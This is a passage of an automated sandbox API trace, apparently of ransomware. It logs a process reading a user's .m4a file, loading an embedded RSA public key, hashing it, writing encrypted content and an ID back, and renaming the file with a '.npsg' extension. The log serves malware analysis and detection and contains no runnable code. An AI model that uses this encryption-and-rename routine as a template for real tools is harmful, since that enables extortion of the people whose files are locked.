returned=".m4a" [0237.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\ohyT8Iq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ohyt8iq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.256] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=88904) returned 1 [0237.256] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.263] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15b22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.263] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.265] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.265] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x15b48, lpOverlapped=0x0) returned 1 [0237.266] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.266] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.266] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.266] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.268] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.268] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.268] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.268] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.268] GetLastError () returned 0x0 [0237.268] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.268] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.268] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.268] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.268] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x15b50) returned 0x3b95d50 [0237.269] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408ee8 [0237.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400500 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408f30 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400560 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.270] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400560 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400548 [0237.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.271] GetCurrentThreadId () returned 0x5b4 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b81e08 [0237.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.272] GetCurrentThreadId () returned 0x5b4 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400560 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400530 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005c0 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005d8 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400578 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400548 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3408f30 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.276] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x15b43, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x15b43, lpOverlapped=0x0) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0237.276] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15b48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.276] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.277] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.277] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.277] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.277] CloseHandle (hObject=0x644) returned 1 [0237.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.278] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\ohyT8Iq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ohyt8iq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\ohyT8Iq.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ohyt8iq.m4a.npsg")) returned 1 [0237.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 